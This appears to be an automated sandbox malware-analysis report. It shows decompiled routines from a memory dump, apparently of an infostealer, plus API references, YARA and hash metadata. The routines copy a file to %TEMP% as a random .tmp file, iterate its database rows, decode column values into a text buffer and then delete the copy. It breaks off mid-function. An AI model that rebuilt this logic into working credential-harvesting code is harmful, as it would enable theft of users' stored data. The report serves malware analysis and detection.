                                                                                                                                                                                              				intOrPtr _t230;
                                                                                                                                                                                              				intOrPtr _t231;
                                                                                                                                                                                              				void* _t232;
                                                                                                                                                                                              				void* _t233;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t228 = __esi;
                                                                                                                                                                                              				_t190 = __ebx;
                                                                                                                                                                                              				 *__eax =  *__eax | __eax;
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				_t70 = __eax;
                                                                                                                                                                                              				 *_t70 =  *_t70 + _t70;
                                                                                                                                                                                              				_t71 = _t70 | 0x00000a00;
                                                                                                                                                                                              				 *_t71 =  *_t71 + _t71;
                                                                                                                                                                                              				_v117 = _v117 + __edx;
                                                                                                                                                                                              				_t230 = _t231;
                                                                                                                                                                                              				_t191 = 0xb;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t191 = _t191 - 1;
                                                                                                                                                                                              					_t240 = _t191;
                                                                                                                                                                                              				} while (_t191 != 0);
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = _t71;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				_push(_t230);
                                                                                                                                                                                              				_push(0x411163);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t231;
                                                                                                                                                                                              				E00403B80( &_v28);
                                                                                                                                                                                              				_push(_t230);
                                                                                                                                                                                              				_push(0x4110ce);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t231;
                                                                                                                                                                                              				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t240);
                                                                                                                                                                                              				_push(_v52);
                                                                                                                                                                                              				E00406F1C( &_v56, __ebx, __edi, __esi, _t240);
                                                                                                                                                                                              				_push(_v56);
                                                                                                                                                                                              				_push(L".tmp");
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v8, _t190,  &_v40, _t240);
                                                                                                                                                                                              				E004062D8(L"%TEMP%",  &_v64, _t240);
                                                                                                                                                                                              				_push(_v64);
                                                                                                                                                                                              				_push(0x41119c);
                                                                                                                                                                                              				_push(_v32);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v60, _t190,  &_v44, _t240);
                                                                                                                                                                                              				_t91 = E00403D3C(_v44);
                                                                                                                                                                                              				CopyFileW(E00403D3C(_v40), _t91, 0xffffffff);
                                                                                                                                                                                              				E0040377C( &_v68, _v44);
                                                                                                                                                                                              				E00404AFC(_v68, _t190, _t191,  &_v36, _t228, _t240);
                                                                                                                                                                                              				E00403D2C( &_v72, _v36);
                                                                                                                                                                                              				if(E004076B0(_v72, _t190, _t191) != 0) {
                                                                                                                                                                                              					_t106 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                              					_t108 =  *((intOrPtr*)( *_t106))(E00403990(_v36),  &_v16);
                                                                                                                                                                                              					_t232 = _t231 + 8;
                                                                                                                                                                                              					__eflags = _t108;
                                                                                                                                                                                              					if(_t108 == 0) {
                                                                                                                                                                                              						E00408120(0x66,  &_v76);
                                                                                                                                                                                              						_t151 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                              						_t153 =  *((intOrPtr*)( *_t151))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                              						_t233 = _t232 + 0x14;
                                                                                                                                                                                              						__eflags = _t153;
                                                                                                                                                                                              						if(_t153 == 0) {
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								_t155 =  *0x41b600; // 0x41c790
                                                                                                                                                                                              								_t157 =  *((intOrPtr*)( *_t155))(_v20);
                                                                                                                                                                                              								__eflags = _t157 - 0x64;
                                                                                                                                                                                              								if(_t157 != 0x64) {
                                                                                                                                                                                              									goto L11;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t159 =  *0x41b644; // 0x41c798
                                                                                                                                                                                              								_t163 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								_t165 =  *((intOrPtr*)( *_t163))(_v20, 3,  *((intOrPtr*)( *_t159))(_v20, 3));
                                                                                                                                                                                              								_pop(_t220);
                                                                                                                                                                                              								E004094C4(_t165,  &_v48, _t220);
                                                                                                                                                                                              								E00403D2C( &_v80, _v48);
                                                                                                                                                                                              								_t170 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								E00403C98( &_v84,  *((intOrPtr*)( *_t170))(_v20, 0, 0x4111a4, _v80, _v28));
                                                                                                                                                                                              								_t176 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								E00403C98( &_v88,  *((intOrPtr*)( *_t176))(_v20, 1, 0x4111a4, _v84));
                                                                                                                                                                                              								_t182 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								_t184 =  *((intOrPtr*)( *_t182))(_v20, 2, 0x4111b0, _v88);
                                                                                                                                                                                              								_t233 = _t233 + 0x28;
                                                                                                                                                                                              								E00403C98( &_v92, _t184);
                                                                                                                                                                                              								_push(_v92);
                                                                                                                                                                                              								_push(L"\r\n\r\n");
                                                                                                                                                                                              								E00403E1C();
                                                                                                                                                                                              								_t188 =  *0x41b584; // 0x41b0b4
                                                                                                                                                                                              								 *_t188 =  *_t188 + 1;
                                                                                                                                                                                              								__eflags =  *_t188;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L11:
                                                                                                                                                                                              					_t110 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                              					 *((intOrPtr*)( *_t110))(_v20);
                                                                                                                                                                                              					_t114 =  *0x41b590; // 0x41c788
                                                                                                                                                                                              					 *((intOrPtr*)( *_t114))(_v16);
                                                                                                                                                                                              					_pop(_t212);
                                                                                                                                                                                              					 *[fs:eax] = _t212;
                                                                                                                                                                                              					E00403BBC(_v12, _v28);
                                                                                                                                                                                              					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_pop(_t226);
                                                                                                                                                                                              					 *[fs:eax] = _t226;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t214);
                                                                                                                                                                                              				 *[fs:eax] = _t214;
                                                                                                                                                                                              				_push(E0041116A);
                                                                                                                                                                                              				E00403B98( &_v92, 4);
                                                                                                                                                                                              				E004034E4( &_v76);
                                                                                                                                                                                              				E00403B80( &_v72);
                                                                                                                                                                                              				E004034E4( &_v68);
                                                                                                                                                                                              				E00403B98( &_v64, 4);
                                                                                                                                                                                              				E004034E4( &_v48);
                                                                                                                                                                                              				E00403B98( &_v44, 2);
                                                                                                                                                                                              				E004034E4( &_v36);
                                                                                                                                                                                              				E00403B98( &_v32, 2);
                                                                                                                                                                                              				return E00403B80( &_v8);
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x00411162

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CopyCountFileTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 3448371392-3650661790
                                                                                                                                                                                              • Opcode ID: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                                                                                                                                                                                              • Instruction ID: 2c73a4ceecea9b7a55c8e1441bd033eb3759b1d2195d340dd4b2e4f4f6784083
                                                                                                                                                                                              • Opcode Fuzzy Hash: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF412131904149AFDB01FFA1D842ACDBBB9EF49318F50447BF500B36A2D67CAE458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E00410E68(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				intOrPtr _v117;
                                                                                                                                                                                              				signed int _t70;
                                                                                                                                                                                              				WCHAR* _t90;
                                                                                                                                                                                              				intOrPtr* _t105;
                                                                                                                                                                                              				intOrPtr _t107;
                                                                                                                                                                                              				intOrPtr* _t109;
                                                                                                                                                                                              				intOrPtr* _t113;
                                                                                                                                                                                              				intOrPtr* _t150;
                                                                                                                                                                                              				intOrPtr _t152;
                                                                                                                                                                                              				intOrPtr* _t154;
                                                                                                                                                                                              				void* _t156;
                                                                                                                                                                                              				intOrPtr* _t158;
                                                                                                                                                                                              				intOrPtr* _t162;
                                                                                                                                                                                              				void* _t164;
                                                                                                                                                                                              				intOrPtr* _t169;
                                                                                                                                                                                              				intOrPtr* _t175;
                                                                                                                                                                                              				intOrPtr* _t181;
                                                                                                                                                                                              				void* _t183;
                                                                                                                                                                                              				intOrPtr* _t187;
                                                                                                                                                                                              				void* _t190;
                                                                                                                                                                                              				intOrPtr _t211;
                                                                                                                                                                                              				intOrPtr _t213;
                                                                                                                                                                                              				void* _t219;
                                                                                                                                                                                              				intOrPtr _t225;
                                                                                                                                                                                              				intOrPtr _t229;
                                                                                                                                                                                              				intOrPtr _t230;
                                                                                                                                                                                              				void* _t231;
                                                                                                                                                                                              				void* _t232;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t227 = __esi;
                                                                                                                                                                                              				_t189 = __ebx;
                                                                                                                                                                                              				_t70 = __eax | 0x00000a00;
                                                                                                                                                                                              				 *_t70 =  *_t70 + _t70;
                                                                                                                                                                                              				_v117 = _v117 + __edx;
                                                                                                                                                                                              				_t229 = _t230;
                                                                                                                                                                                              				_t190 = 0xb;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t190 = _t190 - 1;
                                                                                                                                                                                              					_t238 = _t190;
                                                                                                                                                                                              				} while (_t190 != 0);
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = _t70;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				_push(_t229);
                                                                                                                                                                                              				_push(0x411163);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t230;
                                                                                                                                                                                              				E00403B80( &_v28);
                                                                                                                                                                                              				_push(_t229);
                                                                                                                                                                                              				_push(0x4110ce);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t230;
                                                                                                                                                                                              				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t238);
                                                                                                                                                                                              				_push(_v52);
                                                                                                                                                                                              				E00406F1C( &_v56, __ebx, __edi, __esi, _t238);
                                                                                                                                                                                              				_push(_v56);
                                                                                                                                                                                              				_push(L".tmp");
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v8, _t189,  &_v40, _t238);
                                                                                                                                                                                              				E004062D8(L"%TEMP%",  &_v64, _t238);
                                                                                                                                                                                              				_push(_v64);
                                                                                                                                                                                              				_push(0x41119c);
                                                                                                                                                                                              				_push(_v32);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v60, _t189,  &_v44, _t238);
                                                                                                                                                                                              				_t90 = E00403D3C(_v44);
                                                                                                                                                                                              				CopyFileW(E00403D3C(_v40), _t90, 0xffffffff);
                                                                                                                                                                                              				E0040377C( &_v68, _v44);
                                                                                                                                                                                              				E00404AFC(_v68, _t189, _t190,  &_v36, _t227, _t238);
                                                                                                                                                                                              				E00403D2C( &_v72, _v36);
                                                                                                                                                                                              				if(E004076B0(_v72, _t189, _t190) != 0) {
                                                                                                                                                                                              					_t105 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                              					_t107 =  *((intOrPtr*)( *_t105))(E00403990(_v36),  &_v16);
                                                                                                                                                                                              					_t231 = _t230 + 8;
                                                                                                                                                                                              					__eflags = _t107;
                                                                                                                                                                                              					if(_t107 == 0) {
                                                                                                                                                                                              						E00408120(0x66,  &_v76);
                                                                                                                                                                                              						_t150 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                              						_t152 =  *((intOrPtr*)( *_t150))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                              						_t232 = _t231 + 0x14;
                                                                                                                                                                                              						__eflags = _t152;
                                                                                                                                                                                              						if(_t152 == 0) {
                                                                                                                                                                                              							while(1) {
					_t154 =  *0x41b600; // 0x41c790
					_t156 =  *((intOrPtr*)( *_t154))(_v20);
					__eflags = _t156 - 0x64;
					if(_t156 != 0x64) {
						goto L10;
					}
					_t158 =  *0x41b644; // 0x41c798
					_t162 =  *0x41b588; // 0x41c794
					_t164 =  *((intOrPtr*)( *_t162))(_v20, 3,  *((intOrPtr*)( *_t158))(_v20, 3));
					_pop(_t219);
					E004094C4(_t164,  &_v48, _t219);
					E00403D2C( &_v80, _v48);
					_t169 =  *0x41b588; // 0x41c794
					E00403C98( &_v84,  *((intOrPtr*)( *_t169))(_v20, 0, 0x4111a4, _v80, _v28));
					_t175 =  *0x41b588; // 0x41c794
					E00403C98( &_v88,  *((intOrPtr*)( *_t175))(_v20, 1, 0x4111a4, _v84));
					_t181 =  *0x41b588; // 0x41c794
					_t183 =  *((intOrPtr*)( *_t181))(_v20, 2, 0x4111b0, _v88);
					_t232 = _t232 + 0x28;
					E00403C98( &_v92, _t183);
					_push(_v92);
					_push(L"\r\n\r\n");
					E00403E1C();
					_t187 =  *0x41b584; // 0x41b0b4
					 *_t187 =  *_t187 + 1;
					__eflags =  *_t187;
				}
			}
		}
		L10:
		_t109 =  *0x41b654; // 0x41c79c
		 *((intOrPtr*)( *_t109))(_v20);
		_t113 =  *0x41b590; // 0x41c788
		 *((intOrPtr*)( *_t113))(_v16);
		_pop(_t211);
		 *[fs:eax] = _t211;
		E00403BBC(_v12, _v28);
		DeleteFileW(E00403D3C(_v44));
	} else {
		_pop(_t225);
		 *[fs:eax] = _t225;
	}
	_pop(_t213);
	 *[fs:eax] = _t213;
	_push(E0041116A);
	E00403B98( &_v92, 4);
	E004034E4( &_v76);
	E00403B80( &_v72);
	E004034E4( &_v68);
	E00403B98( &_v64, 4);
	E004034E4( &_v48);
	E00403B98( &_v44, 2);
	E004034E4( &_v36);
	E00403B98( &_v32, 2);
	return E00403B80( &_v8);
}

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CopyCountFileTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 3448371392-3650661790
                                                                                                                                                                                              • Opcode ID: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                                                                                                                                                                                              • Instruction ID: 3bd2312418c75e2bfd4f88111c3886d823680ea6e83d1d6075c9c2a9f0993f15
                                                                                                                                                                                              • Opcode Fuzzy Hash: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4241013190410DAEDB01FFA1D842ADDBBB9EF49318F50447BF500B36A2D77DAE458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E00410BB0(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				signed int _t57;
                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                              				WCHAR* _t78;
                                                                                                                                                                                              				intOrPtr* _t93;
                                                                                                                                                                                              				void* _t95;
                                                                                                                                                                                              				intOrPtr* _t97;
                                                                                                                                                                                              				intOrPtr* _t101;
                                                                                                                                                                                              				intOrPtr* _t134;
                                                                                                                                                                                              				void* _t136;
                                                                                                                                                                                              				intOrPtr* _t138;
                                                                                                                                                                                              				void* _t140;
                                                                                                                                                                                              				intOrPtr* _t142;
                                                                                                                                                                                              				intOrPtr* _t148;
                                                                                                                                                                                              				void* _t150;
                                                                                                                                                                                              				void* _t156;
                                                                                                                                                                                              				intOrPtr _t176;
                                                                                                                                                                                              				intOrPtr _t178;
                                                                                                                                                                                              				intOrPtr _t186;
                                                                                                                                                                                              				intOrPtr _t190;
                                                                                                                                                                                              				intOrPtr _t191;
                                                                                                                                                                                              				void* _t192;
                                                                                                                                                                                              				void* _t193;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t188 = __esi;
                                                                                                                                                                                              				_t155 = __ebx;
                                                                                                                                                                                              				_t57 = __eax +  *__eax;
                                                                                                                                                                                              				 *_t57 =  *_t57 + _t57;
                                                                                                                                                                                              				_t58 = _t57 | 0x5500000a;
                                                                                                                                                                                              				_t190 = _t191;
                                                                                                                                                                                              				_t156 = 9;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t156 = _t156 - 1;
                                                                                                                                                                                              					_t197 = _t156;
                                                                                                                                                                                              				} while (_t156 != 0);
                                                                                                                                                                                              				_push(_t156);
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = _t58;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				_push(_t190);
                                                                                                                                                                                              				_push(0x410e20);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t191;
                                                                                                                                                                                              				E00403B80( &_v28);
                                                                                                                                                                                              				_push(_t190);
                                                                                                                                                                                              				_push(0x410da0);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t191;
                                                                                                                                                                                              				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t197);
                                                                                                                                                                                              				_push(_v48);
                                                                                                                                                                                              				E00406F1C( &_v52, __ebx, __edi, __esi, _t197);
                                                                                                                                                                                              				_push(_v52);
                                                                                                                                                                                              				_push(L".tmp");
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v8, _t155,  &_v40, _t197);
                                                                                                                                                                                              				E004062D8(L"%TEMP%",  &_v60, _t197);
                                                                                                                                                                                              				_push(_v60);
                                                                                                                                                                                              				_push(E00410E58);
                                                                                                                                                                                              				_push(_v32);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v56, _t155,  &_v44, _t197);
                                                                                                                                                                                              				_t78 = E00403D3C(_v44);
                                                                                                                                                                                              				CopyFileW(E00403D3C(_v40), _t78, 0xffffffff);
                                                                                                                                                                                              				E0040377C( &_v64, _v44);
                                                                                                                                                                                              				E00404AFC(_v64, _t155, _t156,  &_v36, _t188, _t197);
                                                                                                                                                                                              				E00403D2C( &_v68, _v36);
                                                                                                                                                                                              				if(E004076B0(_v68, _t155, _t156) != 0) {
                                                                                                                                                                                              					_t93 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                              					_t95 =  *((intOrPtr*)( *_t93))(E00403990(_v36),  &_v16);
                                                                                                                                                                                              					_t192 = _t191 + 8;
                                                                                                                                                                                              					__eflags = _t95;
                                                                                                                                                                                              					if(_t95 == 0) {
                                                                                                                                                                                              						E00408120(0x65,  &_v72);
                                                                                                                                                                                              						_t134 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                              						_t136 =  *((intOrPtr*)( *_t134))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                              						_t193 = _t192 + 0x14;
                                                                                                                                                                                              						__eflags = _t136;
                                                                                                                                                                                              						if(_t136 == 0) {
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								_t138 =  *0x41b600; // 0x41c790
                                                                                                                                                                                              								_t140 =  *((intOrPtr*)( *_t138))(_v20);
                                                                                                                                                                                              								__eflags = _t140 - 0x64;
                                                                                                                                                                                              								if(_t140 != 0x64) {
                                                                                                                                                                                              									goto L11;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t142 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								E00403C98( &_v76,  *((intOrPtr*)( *_t142))(_v20, 0, _v28));
                                                                                                                                                                                              								_t148 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								_t150 =  *((intOrPtr*)( *_t148))(_v20, 1, E00410E60, _v76);
                                                                                                                                                                                              								_t193 = _t193 + 0x10;
                                                                                                                                                                                              								E00403C98( &_v80, _t150);
                                                                                                                                                                                              								_push(_v80);
                                                                                                                                                                                              								_push(E00410E68);
                                                                                                                                                                                              								E00403E1C();
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L11:
                                                                                                                                                                                              					_t97 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                              					 *((intOrPtr*)( *_t97))(_v20);
                                                                                                                                                                                              					_t101 =  *0x41b590; // 0x41c788
                                                                                                                                                                                              					 *((intOrPtr*)( *_t101))(_v16);
                                                                                                                                                                                              					_pop(_t176);
                                                                                                                                                                                              					 *[fs:eax] = _t176;
                                                                                                                                                                                              					E00403BBC(_v12, _v28);
                                                                                                                                                                                              					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_pop(_t186);
                                                                                                                                                                                              					 *[fs:eax] = _t186;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t178);
                                                                                                                                                                                              				 *[fs:eax] = _t178;
                                                                                                                                                                                              				_push(E00410E27);
                                                                                                                                                                                              				E00403B98( &_v80, 2);
                                                                                                                                                                                              				E004034E4( &_v72);
                                                                                                                                                                                              				E00403B80( &_v68);
                                                                                                                                                                                              				E004034E4( &_v64);
                                                                                                                                                                                              				E00403B98( &_v60, 6);
                                                                                                                                                                                              				E004034E4( &_v36);
                                                                                                                                                                                              				E00403B98( &_v32, 2);
                                                                                                                                                                                              				return E00403B80( &_v8);
                                                                                                                                                                                              			}

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410BFD
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CopyCountFileTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 3448371392-3650661790
                                                                                                                                                                                              • Opcode ID: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                                                                                                                                                                                              • Instruction ID: ad1686550c7843c0884c0506788be05dc1fde737249d1bd281ecbc27d8194f8d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                                                                                                                                                                                              • Instruction Fuzzy Hash: BF412330914109AEDB01FF91D952ADDBBBDEF49318F50447BF400B7292D77CAE458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E00410BB4(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				signed int _t57;
                                                                                                                                                                                              				WCHAR* _t77;
                                                                                                                                                                                              				intOrPtr* _t92;
                                                                                                                                                                                              				void* _t94;
                                                                                                                                                                                              				intOrPtr* _t96;
                                                                                                                                                                                              				intOrPtr* _t100;
                                                                                                                                                                                              				intOrPtr* _t133;
                                                                                                                                                                                              				void* _t135;
                                                                                                                                                                                              				intOrPtr* _t137;
                                                                                                                                                                                              				void* _t139;
                                                                                                                                                                                              				intOrPtr* _t141;
                                                                                                                                                                                              				intOrPtr* _t147;
                                                                                                                                                                                              				void* _t149;
                                                                                                                                                                                              				void* _t155;
                                                                                                                                                                                              				intOrPtr _t175;
                                                                                                                                                                                              				intOrPtr _t177;
                                                                                                                                                                                              				intOrPtr _t185;
                                                                                                                                                                                              				intOrPtr _t189;
                                                                                                                                                                                              				intOrPtr _t190;
                                                                                                                                                                                              				void* _t191;
                                                                                                                                                                                              				void* _t192;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t187 = __esi;
                                                                                                                                                                                              				_t154 = __ebx;
                                                                                                                                                                                              				_t57 = __eax | 0x5500000a;
                                                                                                                                                                                              				_t189 = _t190;
                                                                                                                                                                                              				_t155 = 9;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t155 = _t155 - 1;
                                                                                                                                                                                              					_t195 = _t155;
                                                                                                                                                                                              				} while (_t155 != 0);
                                                                                                                                                                                              				_push(_t155);
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = _t57;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				_push(_t189);
                                                                                                                                                                                              				_push(0x410e20);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t190;
                                                                                                                                                                                              				E00403B80( &_v28);
                                                                                                                                                                                              				_push(_t189);
                                                                                                                                                                                              				_push(0x410da0);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t190;
                                                                                                                                                                                              				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t195);
                                                                                                                                                                                              				_push(_v48);
                                                                                                                                                                                              				E00406F1C( &_v52, __ebx, __edi, __esi, _t195);
                                                                                                                                                                                              				_push(_v52);
                                                                                                                                                                                              				_push(L".tmp");
                                                                                                                                                                                              				E00403E1C();
